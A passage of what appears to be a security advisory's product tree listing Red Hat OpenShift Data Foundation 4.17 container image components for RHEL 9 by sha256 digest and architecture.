"default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", }, product_reference: "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", }, product_reference: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", }, product_reference: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", }, product_reference: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", }, product_reference: "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", }, product_reference: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", }, product_reference: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", }, product_reference: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", }, product_reference: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", }, product_reference: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", }, product_reference: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", }, product_reference: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", }, product_reference: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", }, product_reference: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", }, product_reference: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", }, product_reference: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", }, product_reference: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", }, product_reference: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", }, product_reference: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", }, product_reference: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", }, product_reference: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", }, product_reference: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", }, product_reference: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", }, product_reference: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", }, product_reference: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", }, product_reference: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", }, product_reference: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", }, product_reference: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", }, product_reference: 